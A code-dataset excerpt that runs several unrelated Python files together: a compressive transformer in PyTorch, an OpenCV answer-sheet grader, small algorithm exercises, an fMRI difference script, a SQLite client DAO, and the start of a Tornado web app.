cmems[i].size(1)\n\n if old_mem_prev_lvl.size(1) > 0 and self.use_ltmem:\n old_cmem_k, old_cmem_v = (self.ltmem_tokv(old_mem_prev_lvl)\n .unsqueeze(dim=1) # Insert fake head dimension\n .chunk(2, dim=-1))\n to_ltmem_query = self.cmem_to_ltmem_query.expand(b, 1, 1, e) # b x 1(=h) x 1(=seq) x e\n ltmem_update = full_attn(to_ltmem_query, old_cmem_k, old_cmem_v)\n if ltmem_len > 0:\n new_ltmem = self.recurrence(ltmem_update.view(b, e), ltmem.squeeze(dim=1)).unsqueeze(dim=1)\n else:\n new_ltmem = ltmem_update.squeeze(dim=1) # Remove heads dimension\n\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n\n# transformer\n\nclass CompressiveTransformer(nn.Module):\n def __init__(self, num_tokens, dim, seq_len, depth, emb_dim=None,\n memory_layers=None, mem_len=None,\n cmem_lengths: List[int] = None, cmem_ratios: Union[int, List[int]] = 4,\n use_ltmem=True,\n heads=8, gru_gated_residual=True, mogrify_gru=False, attn_dropout=0.,\n ff_glu=False, ff_dim=None, ff_dropout=0.,\n attn_layer_dropout=0., reconstruction_attn_dropout=0., reconstruction_loss_weight=1.,\n one_kv_head=False):\n super().__init__()\n if isinstance(cmem_ratios, int):\n if cmem_lengths is None:\n cmem_ratios = [cmem_ratios]\n else:\n cmem_ratios = [cmem_ratios] * len(cmem_lengths)\n else:\n assert cmem_lengths is not None\n assert len(cmem_lengths) == len(cmem_ratios)\n\n ff_dim = default(ff_dim, dim * 4)\n emb_dim = default(emb_dim, dim)\n mem_len = default(mem_len, seq_len)\n cmem_lengths = default(cmem_lengths, [mem_len // cmem_ratios[0]])\n memory_layers = default(memory_layers, list(range(1, depth + 1)))\n\n assert mem_len >= seq_len, 'length of memory should be at least the sequence length'\n assert all(\n [0 < layer <= depth for layer in memory_layers]), 'one of the indicated memory layers is invalid'\n\n self.seq_len = seq_len\n\n self.depth = depth\n self.memory_layers = list(memory_layers)\n self.num_cmem_stages = len(cmem_lengths)\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.to_model_dim = nn.Identity() if emb_dim == dim else nn.Linear(emb_dim, dim)\n\n seq_and_mem_len = seq_len + mem_len + sum(cmem_lengths) + (1 if use_ltmem else 0) # + 1 for LT Memory\n self.pos_emb = nn.Parameter(torch.zeros(heads, seq_and_mem_len, dim // heads), requires_grad=True)\n\n self.to_logits = nn.Sequential(\n nn.Identity() if emb_dim == dim else nn.Linear(dim, emb_dim),\n nn.Linear(emb_dim, num_tokens)\n )\n\n wrapper = partial(GRUGating, dim, mogrify=mogrify_gru) if gru_gated_residual else Residual\n\n self.attn_layers = nn.ModuleList([\n wrapper(PreNorm(dim, SelfAttention(\n dim, seq_len, mem_len,\n cmem_lengths if (i + 1) in memory_layers else [],\n cmem_ratios if (i + 1) in memory_layers else [],\n use_ltmem and (i + 1) in memory_layers,\n heads, dropout=attn_layer_dropout,\n attn_dropout=attn_dropout,\n reconstruction_attn_dropout=reconstruction_attn_dropout,\n one_kv_head=one_kv_head\n ))) for i in range(depth)])\n self.ff_layers = nn.ModuleList(\n [wrapper(PreNorm(dim, FeedForward(dim, ff_dim, dropout=ff_dropout, glu=ff_glu))) for _ in range(depth)])\n\n self.reconstruction_loss_weight = reconstruction_loss_weight\n\n def forward(self, x, memories=None, mask=None):\n input_device = x.device\n x = self.token_emb(x)\n x = self.to_model_dim(x)\n b, t, d = x.shape\n\n assert t <= self.seq_len, f'input contains a sequence length {t} that is greater than the designated maximum ' \\\n f'sequence length {self.seq_len} '\n\n memories = default(memories, (None, None, None))\n mem, cmems, ltmem = memories\n\n num_memory_layers = len(self.memory_layers)\n init_empty_mem = lambda: torch.empty(num_memory_layers, b, 0, d, **to(x))\n mem = default(mem, init_empty_mem)\n cmems = default(cmems, lambda: [init_empty_mem() for i in range(self.num_cmem_stages)])\n ltmem = default(ltmem, init_empty_mem)\n\n total_len = mem.shape[2] + sum(cmem.shape[2] for cmem in cmems) + ltmem.shape[2] + self.seq_len\n pos_emb = self.pos_emb[:, (self.seq_len - t):total_len]\n\n # Lists of {c,lt,}mem per transformer layer\n next_mem = []\n next_cmems = []\n next_ltmem = []\n aux_loss = torch.tensor(0., requires_grad=True, **to(x))\n\n mem_iter, ltmem_iter = map(iterate_tensor, (mem, ltmem))\n cmems_iter = ([cmem[i] for cmem in cmems] for i in range(num_memory_layers))\n\n for ind in range(self.depth):\n x, mem_out, cmems_out, ltmem_out, layer_aux_loss \\\n = self._pass_through_layer(ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x)\n aux_loss = aux_loss + layer_aux_loss\n\n if (ind + 1) not in self.memory_layers:\n continue\n\n next_mem.append(mem_out)\n next_cmems.append(cmems_out)\n next_ltmem.append(ltmem_out)\n\n out = self.to_logits(x)\n\n next_mem, next_ltmem = map(torch.stack, (next_mem, next_ltmem))\n next_cmems = [torch.stack([next_cmems[layer][cstage] for layer in range(num_memory_layers)])\n for cstage in range(self.num_cmem_stages)]\n\n aux_loss = aux_loss * self.reconstruction_loss_weight / num_memory_layers\n out = out.to(device=input_device)\n return out, Memory(mem=next_mem, compressed_mem=next_cmems, lt_mem=next_ltmem), aux_loss\n\n def _pass_through_layer(self, ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x):\n attn = self.attn_layers[ind]\n ff = self.ff_layers[ind]\n\n layer_num = ind + 1\n use_memory = layer_num in self.memory_layers\n memories = (next(mem_iter), next(cmems_iter), next(ltmem_iter)) if use_memory else None\n _dev = lambda t: t.to(device=x.device)\n memories = (_dev(memories[0]), [_dev(m) for m in memories[1]], _dev(memories[2])) if memories else None\n\n x, (mem_out, cmems_out, ltmem_out), layer_aux_loss = attn(x, memories=memories, calc_memory=use_memory,\n input_mask=mask, pos_emb=pos_emb)\n x, = ff(x)\n\n return x, mem_out, cmems_out, ltmem_out, layer_aux_loss\n\n\nclass MultiDeviceCompressiveTransformer(CompressiveTransformer):\n \"\"\"\n CompressiveTransformer with model parallelism.\n Note: Start fairseq-train with\n --distributed-no-spawn\n --distributed-world-size 1\n to prevent data parallelism\n \"\"\"\n\n def __init__(self, num_tokens, dim, seq_len, depth, emb_dim=None, memory_layers=None, mem_len=None,\n cmem_lengths: List[int] = None, cmem_ratios: Union[int, List[int]] = 4, use_ltmem=True, heads=8,\n gru_gated_residual=True, mogrify_gru=False, attn_dropout=0., ff_glu=False, ff_dim=None, ff_dropout=0.,\n attn_layer_dropout=0., reconstruction_attn_dropout=0., reconstruction_loss_weight=1.,\n one_kv_head=False,\n layers_to_gpus=None):\n super().__init__(num_tokens, dim, seq_len, depth, emb_dim, memory_layers, mem_len, cmem_lengths, cmem_ratios,\n use_ltmem, heads, gru_gated_residual, mogrify_gru, attn_dropout, ff_glu, ff_dim, ff_dropout,\n attn_layer_dropout, reconstruction_attn_dropout, reconstruction_loss_weight, one_kv_head)\n\n gpus = torch.cuda.device_count()\n layers_to_gpus = default(layers_to_gpus, [int(i / self.depth * gpus) for i in range(self.depth)])\n assert len(layers_to_gpus) == self.depth\n assert all(0 <= x < gpus for x in layers_to_gpus)\n self.layers_to_gpus = layers_to_gpus\n\n def cuda(self, device=None):\n # pos_emb, token_emb, to_model_dim and to_logits always stays on device 0\n self.pos_emb = nn.Parameter(self.pos_emb.cuda(), requires_grad=True)\n self.token_emb.to(device=0)\n self.to_model_dim.to(device=0)\n self.to_logits.to(device=torch.cuda.device_count() - 1)\n for i in range(self.depth):\n self.attn_layers[i].to(device=self.layers_to_gpus[i])\n self.ff_layers[i].to(device=self.layers_to_gpus[i])\n return self\n\n def _apply(self, fn):\n fake = torch.empty(0)\n if fn(fake).device.type == 'cuda' and fn(fake).device != fake.device:\n return self.cuda()\n else:\n # noinspection PyProtectedMember\n return super()._apply(fn)\n\n def _pass_through_layer(self, ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x):\n gpu = self.layers_to_gpus[ind]\n\n x = x.to(device=gpu)\n pos_emb = pos_emb.to(device=gpu)\n mask = mask.to(device=gpu) if mask else None\n x, mem_out, cmems_out, ltmem_out, layer_aux_loss = super()._pass_through_layer(\n ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x)\n\n mem_out = mem_out.to(device=0) if mem_out is not None else None\n cmems_out = [m.to(device=0) for m in cmems_out] if cmems_out is not None else None\n ltmem_out = ltmem_out.to(device=0) if ltmem_out is not None else None\n layer_aux_loss = layer_aux_loss.to(device=0) if layer_aux_loss is not None else None\n\n return x, mem_out, cmems_out, ltmem_out, layer_aux_loss\n","repo_name":"lbaermann/qaego4d","sub_path":"model/external/compressive_transformer.py","file_name":"compressive_transformer.py","file_ext":"py","file_size_in_byte":25977,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"3748244550","text":"# O(w^2 * h) time | O(w) space - where w and h are the width and height of\n# the array.\ndef waterfallStreams(array, source):\n rowAbove = array[0][:]\n # Set initial water source\n rowAbove[source] = -1\n\n for row in range(1, len(array)):\n currentRow = array[row][:]\n\n # Loop through each cell in row\n for idx in range(len(rowAbove)):\n valueAbove = rowAbove[idx]\n\n # Two bools, \n # one if we have water above, \n hasWaterAbove = valueAbove < 0\n # other if we are a block.\n hasBlock = currentRow[idx] == 1\n\n if not hasWaterAbove:\n continue\n\n if not hasBlock:\n # If there is no block in the current column, move the water down.\n currentRow[idx] += valueAbove\n continue \n\n # If water above and block...\n splitWater = valueAbove / 2\n \n # Move water right.\n rightIdx = idx\n while rightIdx + 1 < len(rowAbove):\n rightIdx += 1\n if rowAbove[rightIdx] == 1: # If there is a block in the way\n break \n if currentRow[rightIdx] != 1: # If there is no block below us\n currentRow[rightIdx] += splitWater\n break \n\n # Move water left.\n leftIdx = idx \n while leftIdx - 1 >= 0:\n leftIdx -= 1\n if rowAbove[leftIdx] == 1:\n break \n if currentRow[leftIdx] != 1:\n currentRow[leftIdx] += splitWater\n break \n rowAbove = currentRow\n\n finalPercentages = list(map(lambda num: num * -100, rowAbove))\n return finalPercentages\n\n\nif __name__ == '__main__':\n array = [\n [0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0],\n ]\n source = 3\n print(waterfallStreams(array, source))","repo_name":"jprice8/interview-prep","sub_path":"arrays/waterfallStreams.py","file_name":"waterfallStreams.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25666859436","text":"import cv2\nimport numpy as np\nimport utlis\n\n\n########################################################################\nwebCamFeed = True\npathImage = \"5.jpg\"\ncap = cv2.VideoCapture(1)\ncap.set(10,160)\nheightImg = 700\nwidthImg = 700\nquestions=5\nchoices=5\nans= [1,2,0,2,4]\n########################################################################\n\n\ncount=0\n\nwhile True:\n\n if webCamFeed:success, img = cap.read()\n else:img = cv2.imread(pathImage)\n img = cv2.resize(img, (widthImg, heightImg)) # RESIZE IMAGE\n imgFinal = img.copy()\n imgBlank = np.zeros((heightImg,widthImg, 3), np.uint8) # CREATE A BLANK IMAGE FOR TESTING DEBUGGING IF REQUIRED\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT IMAGE TO GRAY SCALE\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) # ADD GAUSSIAN BLUR\n imgCanny = cv2.Canny(imgBlur,10,70) # APPLY CANNY \n\n try:\n ## FIND ALL COUNTOURS\n imgContours = img.copy() # COPY IMAGE FOR DISPLAY PURPOSES\n imgBigContour = img.copy() # COPY IMAGE FOR DISPLAY PURPOSES\n contours, hierarchy = cv2.findContours(imgCanny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # FIND ALL CONTOURS\n cv2.drawContours(imgContours, contours, -1, (0, 255, 0), 10) # DRAW ALL DETECTED CONTOURS\n rectCon = utlis.rectContour(contours) # FILTER FOR RECTANGLE CONTOURS\n biggestPoints= utlis.getCornerPoints(rectCon[0]) # GET CORNER POINTS OF THE BIGGEST RECTANGLE\n gradePoints = utlis.getCornerPoints(rectCon[1]) # GET CORNER POINTS OF THE SECOND BIGGEST RECTANGLE\n\n \n\n if biggestPoints.size != 0 and gradePoints.size != 0:\n\n # BIGGEST RECTANGLE WARPING\n biggestPoints=utlis.reorder(biggestPoints) # REORDER FOR WARPING\n cv2.drawContours(imgBigContour, biggestPoints, -1, (0, 255, 0), 20) # DRAW THE BIGGEST CONTOUR\n pts1 = np.float32(biggestPoints) # PREPARE POINTS FOR WARP\n pts2 = np.float32([[0, 0],[widthImg, 0], [0, heightImg],[widthImg, heightImg]]) # PREPARE POINTS FOR WARP\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GET TRANSFORMATION MATRIX\n imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg)) # APPLY WARP PERSPECTIVE\n\n # SECOND BIGGEST RECTANGLE WARPING\n cv2.drawContours(imgBigContour, gradePoints, -1, (255, 0, 0), 20) # DRAW THE BIGGEST CONTOUR\n gradePoints = utlis.reorder(gradePoints) # REORDER FOR WARPING\n ptsG1 = np.float32(gradePoints) # PREPARE POINTS FOR WARP\n ptsG2 = np.float32([[0, 0], [325, 0], [0, 150], [325, 150]]) # PREPARE POINTS FOR WARP\n matrixG = cv2.getPerspectiveTransform(ptsG1, ptsG2)# GET TRANSFORMATION MATRIX\n imgGradeDisplay = cv2.warpPerspective(img, matrixG, (325, 150)) # APPLY WARP PERSPECTIVE\n\n # APPLY THRESHOLD\n imgWarpGray = cv2.cvtColor(imgWarpColored,cv2.COLOR_BGR2GRAY) # CONVERT TO GRAYSCALE\n imgThresh = cv2.threshold(imgWarpGray, 170, 255,cv2.THRESH_BINARY_INV )[1] # APPLY THRESHOLD AND INVERSE\n\n boxes = utlis.splitBoxes(imgThresh) # GET INDIVIDUAL BOXES\n cv2.imshow(\"Split Test \", boxes[3])\n countR=0\n countC=0\n myPixelVal = np.zeros((questions,choices)) # TO STORE THE NON ZERO VALUES OF EACH BOX\n for image in boxes:\n #cv2.imshow(str(countR)+str(countC),image)\n totalPixels = cv2.countNonZero(image)\n myPixelVal[countR][countC]= totalPixels\n countC += 1\n if (countC==choices):countC=0;countR +=1\n\n # FIND THE USER ANSWERS AND PUT THEM IN A LIST\n myIndex=[]\n for x in range (0,questions):\n arr = myPixelVal[x]\n myIndexVal = np.where(arr == np.amax(arr))\n myIndex.append(myIndexVal[0][0])\n #print(\"USER ANSWERS\",myIndex)\n\n # COMPARE THE VALUES TO FIND THE CORRECT ANSWERS\n grading=[]\n for x in range(0,questions):\n if ans[x] == myIndex[x]:\n grading.append(1)\n else:grading.append(0)\n #print(\"GRADING\",grading)\n score = (sum(grading)/questions)*100 # FINAL GRADE\n #print(\"SCORE\",score)\n\n # DISPLAYING ANSWERS\n utlis.showAnswers(imgWarpColored,myIndex,grading,ans) # DRAW DETECTED ANSWERS\n utlis.drawGrid(imgWarpColored) # DRAW GRID\n imgRawDrawings = np.zeros_like(imgWarpColored) # NEW BLANK IMAGE WITH WARP IMAGE SIZE\n utlis.showAnswers(imgRawDrawings, myIndex, grading, ans) # DRAW ON NEW IMAGE\n invMatrix = cv2.getPerspectiveTransform(pts2, pts1) # INVERSE TRANSFORMATION MATRIX\n imgInvWarp = cv2.warpPerspective(imgRawDrawings, invMatrix, (widthImg, heightImg)) # INV IMAGE WARP\n\n # DISPLAY GRADE\n imgRawGrade = np.zeros_like(imgGradeDisplay,np.uint8) # NEW BLANK IMAGE WITH GRADE AREA SIZE\n cv2.putText(imgRawGrade,str(int(score))+\"%\",(70,100)\n ,cv2.FONT_HERSHEY_COMPLEX,3,(0,255,255),3) # ADD THE GRADE TO NEW IMAGE\n invMatrixG = cv2.getPerspectiveTransform(ptsG2, ptsG1) # INVERSE TRANSFORMATION MATRIX\n imgInvGradeDisplay = cv2.warpPerspective(imgRawGrade, invMatrixG, (widthImg, heightImg)) # INV IMAGE WARP\n\n # SHOW ANSWERS AND GRADE ON FINAL IMAGE\n imgFinal = cv2.addWeighted(imgFinal, 1, imgInvWarp, 1,0)\n imgFinal = cv2.addWeighted(imgFinal, 1, imgInvGradeDisplay, 1,0)\n\n # IMAGE ARRAY FOR DISPLAY\n imageArray = ([img,imgGray,imgCanny,imgContours],\n [imgBigContour,imgThresh,imgWarpColored,imgFinal])\n cv2.imshow(\"Final Result\", imgFinal)\n except:\n imageArray = ([img,imgGray,imgCanny,imgContours],\n [imgBlank, imgBlank, imgBlank, imgBlank])\n\n # LABELS FOR DISPLAY\n lables = [[\"Original\",\"Gray\",\"Edges\",\"Contours\"],\n [\"Biggest Contour\",\"Threshold\",\"Warpped\",\"Final\"]]\n\n stackedImage = utlis.stackImages(imageArray,0.5,lables)\n cv2.imshow(\"Result\",stackedImage)\n\n # SAVE IMAGE WHEN 's' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('s'):\n cv2.imwrite(\"Scanned/myImage\"+str(count)+\".jpg\",imgFinal)\n cv2.rectangle(stackedImage, ((int(stackedImage.shape[1] / 2) - 230), int(stackedImage.shape[0] / 2) + 50),\n (1100, 350), (0, 255, 0), cv2.FILLED)\n cv2.putText(stackedImage, \"Scan Saved\", (int(stackedImage.shape[1] / 2) - 200, int(stackedImage.shape[0] / 2)),\n cv2.FONT_HERSHEY_DUPLEX, 3, (0, 0, 255), 5, cv2.LINE_AA)\n cv2.imshow('Result', stackedImage)\n cv2.waitKey(300)\n count += 1","repo_name":"Fafa-DL/Opencv-project","sub_path":"CVZone/13 Optical Mark Recognition (OMR)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"48"} +{"seq_id":"42041513593","text":"def main():\n width = int(input(\"Please enter the width of the box: \"))\n height = int(input(\"Please enter the height of the box: \"))\n boxOutline = input(\"Please enter a symbol for the box outline: \")\n boxFill = input(\"Please enter a symbol of the box fill: \")\n topAndBot = []\n middle = []\n topRow = \"\"\n midRow = \"\"\n for w in range(width):\n topAndBot.append(boxOutline)\n if w == 0 or w == (width - 1):\n middle.append(boxOutline)\n else:\n middle.append(boxFill)\n for l in range(len(topAndBot)):\n topRow = topRow + topAndBot[l]\n for l in range(len(middle)):\n midRow = midRow + middle[l]\n for h in range(height):\n if h == 0 or h == (height - 1):\n print(topRow)\n else:\n print(midRow) \nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_063.py","file_name":"hw5_063.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15564844192","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \n# first = \"\"\n# second = \"\"\n \n# while l1:\n# first += str(l1.val)\n# l1 = l1.next\n \n# while l2:\n# second += str(l2.val)\n# l2 = l2.next\n \n first = \"\"\n second = \"\"\n \n while l1:\n first = str(l1.val) + first\n l1 = l1.next\n \n while l2:\n second = str(l2.val) + second\n l2 = l2.next\n \n total = str(int(first) + int(second))\n l = list(total)\n l.reverse()\n \n temp_node = ListNode(0)\n temp = temp_node\n \n while l:\n val = l.pop(0)\n new = ListNode(int(val))\n temp_node.next = new\n temp_node = temp_node.next\n \n return temp.next\n \n \n \n ","repo_name":"mweaser/leetcode_python","sub_path":"0002-add-two-numbers/0002-add-two-numbers.py","file_name":"0002-add-two-numbers.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70500917586","text":"import os\nimport pandas as pd\nfrom nilearn.image import math_img, load_img\nfrom joblib import Parallel, delayed\n\n\ndef cal_diff(sub,game1_cmap_temp,game2_cmap_temp):\n # calculate the neural difference between two games\n img1 = load_img(game1_cmap_temp.format(sub))\n img2 = load_img(game2_cmap_temp.format(sub))\n diff_img = math_img(\"img2-img1\", img1=img1, img2=img2)\n\n # save the difference image\n save_dir = r'/mnt/workdir/DCM/BIDS/derivatives/Nilearn/game2/value_diff/Setall/6fold/sub-{}/zmap'.format(sub) # look out\n os.makedirs(save_dir, exist_ok=True)\n diff_img.to_filename(os.path.join(save_dir, '{}_zmap.nii.gz'.format('value')))\n\n\n# subject\nparticipants_tsv = r'/mnt/workdir/DCM/BIDS/participants.tsv'\nparticipants_data = pd.read_csv(participants_tsv, sep='\\t')\ndata = participants_data.query(f'game2_fmri>=0.5') # look out\npid = data['Participant_ID'].to_list()\nsub_list = [p.split('-')[-1] for p in pid]\n\n\ngame1_cmap_temp = r'/mnt/data/DCM/result_backup/2023.5.14/Nilearn/game1/value_spct/Setall/6fold/sub-{}/zmap/value_zmap.nii.gz'\ngame2_cmap_temp = r'/mnt/data/DCM/result_backup/2023.5.14/Nilearn/game2/value_spct/Setall/6fold/sub-{}/zmap/value_zmap.nii.gz'\n\n# calculate the difference of image between game1 and game2 for each subject parallelly\nParallel(n_jobs=100)(delayed(cal_diff)(sub, game1_cmap_temp, game2_cmap_temp) for sub in sub_list)","repo_name":"YukunQu/DCM","sub_path":"analysis/mri/game2/game_diff.py","file_name":"game_diff.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9371700170","text":"import cv2\nimport numpy as np\nimport torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom graphviz import Digraph\n\n\nclass MyUtils(object):\n \"\"\"docstring for MyUtils\"\"\"\n def __init__(self):\n super(MyUtils, self).__init__()\n\n \"\"\"\n input: gt: tensor\n output: gt: variable\n \"\"\"\n def tensor2Numpy(self, x, use_cuda=True):\n if use_cuda == True: \n x = x.cpu().data.numpy()\n else:\n x = x.data.numpy()\n x = x[0,:,:,:]\n x = x.transpose((1,2,0))\n return x\n\n def numpy2Tensor(self, x):\n x = x.transpose((2,0,1))\n x = x[np.newaxis, :]\n x = Variable(torch.from_numpy(x))\n return x\n\n # def processGtEccv(self, gt, lambda_=None, return_image=True):\n # gt = self.tensor2Numpy(gt)\n # if lambda_ is not None: lambda_ = self.tensor2Numpy(lambda_)\n \n # gradient = self.makeGradient(gt)\n\n # h,w,c = gt.shape\n\n # res = np.concatenate((gt, gradient, lambda_), axis=2)\n\n\n def save_snapshot(self, epoch, args, net, optimizer):\n torch.save({\n 'epoch': epoch,\n 'args' : args,\n 'state_dict': net.state_dict(),\n 'optimizer': optimizer.state_dict()\n }, 'snapshot{}/snapshot-{}.pth.tar'.format(args.gpu_num, epoch))\n\n\n def processGt(self, gt, scale_factor=1, gd=False, return_image=True):\n s = scale_factor\n gt = gt[0,:,:,:]\n gt = gt.transpose((1,2,0))\n # resize\n while s > 1:\n h,w,c = gt.shape\n gt = cv2.resize(gt, (h//2, w//2))\n s //= 2\n \n # make gradient\n if gd == True:\n gt = self.makeGradient(gt)\n\n if return_image == True: \n display = np.copy(gt)\n if gd == True: \n display += 0.5\n \n gt = gt.transpose((2,0,1))\n gt = gt[np.newaxis, :]\n gt = Variable(torch.from_numpy(gt))\n\n if return_image == True: return gt, display\n return gt\n\n def makeGradient(self, image):\n diff_x = np.diff(image, axis=1);\n diff_y = np.diff(image, axis=0);\n diff = np.zeros((image.shape[0],image.shape[1],image.shape[2]*2))\n diff[0:image.shape[0]-1,:,0:3] = diff_y\n diff[:,0:image.shape[1]-1,3:6] = diff_x\n return diff.astype(np.float32);\n\n def makeGradientTorch(self, image, direction='x', use_gpu=True):\n filters = torch.Tensor(torch.zeros(3,3,3,3))\n if use_gpu == True: filters = filters.cuda()\n for i in range(3):\n filters[i,i,1,1] = -1.\n if direction == 'x':\n for i in range(3):\n filters[i,i,1,2] = 1.\n else:\n for i in range(3):\n filters[i,i,2,1] = 1.\n filters = Variable(filters)\n return F.conv2d(image, filters, padding=1)\n\n def adjust_learning_rate(self, optimizer, args, epoch, beg, end, reset_lr=None):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n base_lr = args.base_lr\n for param_group in optimizer.param_groups:\n if reset_lr != None:\n param_group['lr'] = reset_lr\n continue\n param_group['lr'] = base_lr * (float(end-epoch)/(end-beg)) ** (args.power)\n if param_group['lr'] < 1.0e-8: param_group['lr'] = 1.0e-8\n\n def mse_loss_scalar(self, a, b, use_gpu=True):\n loss = torch.mean((a-b)**2)\n loss = loss.data.cpu().numpy()[0] if use_gpu else loss.data.numpy()[0]\n return loss\n\n def make_dot(self, var, params=None):\n \"\"\" Produces Graphviz representation of PyTorch autograd graph\n Blue nodes are the Variables that require grad, orange are Tensors\n saved for backward in torch.autograd.Function\n Args:\n var: output Variable\n params: dict of (name, Variable) to add names to node that\n require grad (TODO: make optional)\n \"\"\"\n if params is not None:\n assert isinstance(params.values()[0], Variable)\n param_map = {id(v): k for k, v in params.items()}\n\n node_attr = dict(style='filled',\n shape='box',\n align='left',\n fontsize='12',\n ranksep='0.1',\n height='0.2')\n dot = Digraph(node_attr=node_attr, graph_attr=dict(size=\"10240,10240\"), format='svg')\n seen = set()\n\n def size_to_str(size):\n return '('+(', ').join(['%d' % v for v in size])+')'\n\n def add_nodes(var):\n if var not in seen:\n if torch.is_tensor(var):\n dot.node(str(id(var)), size_to_str(var.size()), fillcolor='orange')\n elif hasattr(var, 'variable'):\n u = var.variable\n name = param_map[id(u)] if params is not None else ''\n node_name = '%s\\n %s' % (name, size_to_str(u.size()))\n dot.node(str(id(var)), node_name, fillcolor='lightblue')\n else:\n dot.node(str(id(var)), str(type(var).__name__))\n seen.add(var)\n if hasattr(var, 'next_functions'):\n for u in var.next_functions:\n if u[0] is not None:\n dot.edge(str(id(u[0])), str(id(var)))\n add_nodes(u[0])\n if hasattr(var, 'saved_tensors'):\n for t in var.saved_tensors:\n dot.edge(str(id(t)), str(id(var)))\n add_nodes(t)\n add_nodes(var.grad_fn)\n return dot\n# test\nif __name__ == '__main__':\n pass","repo_name":"albertxavier001/graduation-project","sub_path":"pytorch/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32265286946","text":"#Padrão DAO (Data Access Object);\n#Centraliza o acesso a dados dos objetos cliente.\nfrom model import database\nfrom model.clientes import Clientes\n\nlista_de_clientes = []\n#Adicionar um cliente.\ndef adicionar(novo_cliente):\n lista_de_clientes.append(novo_cliente)\n try:\n conn = database.connect()#Conecta\n cursor = conn.cursor()#Se move no banco\n sql = \"\"\"INSERT INTO Clientes (nome, email, telefone,excluir)\n VALUES (?,?,?,0);\"\"\"\n cursor.execute(sql, novo_cliente.getCliente())\n conn.commit()\n \n except Exception as e:\n print('Deu erro!')\n print(e)\n finally:\n conn.close()\n\n#Editar um cliente.\ndef editar(cliente):\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"UPDATE Clientes SET nome=?,email=?,telefone=? WHERE id = ?;\"\"\"\n l = cliente.getCliente()\n l.append(cliente.id)\n cursor.execute(sql,l)\n conn.commit()\n except Exception as e:\n print(e)\n finally:\n conn.close()\n\n\ndef update_excluir(id, excluir):\n # atualiza contato\n\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"UPDATE Contatos SET excluir=? WHERE id=?;\"\"\"\n cursor.execute(sql, [excluir, id])\n conn.commit()\n except Exception as e:\n print(e)\n finally:\n conn.close()\n\n#Excluir um cliente.\ndef excluir(id_cliente):\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"DELETE FROM Clientes WHERE id = ?;\"\"\"\n cursor.execute(sql,[id_cliente])\n conn.commit()\n\n except Exception as e:\n print(e)\n finally:\n conn.close()\n \n#Lista todos os clientes.\n\n\nlista_clientes = []\nx = []\ndef listar_clientes():\n lista = []\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"SELECT * FROM Clientes WHERE excluir = 0;\"\n cursor.execute(sql)\n linhas = cursor.fetchall()\n for cliente in linhas:\n #Pega as informações dos clientes.\n id = cliente[0]\n nome = cliente[1]\n email = cliente[2]\n telefone = cliente[3]\n excluir = cliente[4]\n \n\n novo_cliente = Clientes(id, nome, email, telefone,excluir)\n lista.append(novo_cliente)\n\n except Exception as e:\n print(e)\n finally:\n conn.close()\n return lista \n \n \n\n#Pegar um cliente específico.\n\n ","repo_name":"Michel3-01/Sistema_Loja_de_Roupas","sub_path":"model/clientes_dao.py","file_name":"clientes_dao.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21715857453","text":"import os\nfrom tornado.options import logging\n\nimport tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nfrom handlers.echo_handler import EchoHandler\nfrom handlers.notes_api_handler import NoteAPIHandler, NotesAPIHandler\nfrom handlers.notes_websockets_handler import NoteWebSocketHandler\n\n__author__ = 'Tiago Pais'\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n\nclass IndexWebSocketsHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index-ws.html\")\n\nsettings = {\n 'auto_reload': True,\n 'static_path': os.path.join(os.path.dirname(__file__), 